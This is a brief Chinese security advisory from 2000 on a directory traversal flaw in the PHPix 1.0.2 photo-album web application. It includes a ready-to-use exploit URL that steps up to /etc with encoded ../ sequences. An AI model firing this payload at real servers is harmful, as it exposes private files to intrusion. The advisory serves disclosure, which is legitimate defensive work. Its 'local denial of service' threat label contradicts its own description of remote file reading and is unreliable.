PHPix Album目录遍历漏洞发布时间:2000-10-11 更新时间:2000-10-11 严重程度:中 威胁程度:本地拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 PHPix PHPix 1.0.2详细描述 PHPix是一个基于WEB的有PHP写的photo-album系统,其中有一个漏洞允许远程 用户来查看目标机器中的任意可读文件,程序中用户可以通过请求../字符的请求 来绕过目录的限制来阅读任意可读文件,导致敏感信息被泄露。 测试代码 http://target.com/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0 解决方案 尚无 相关信息 |
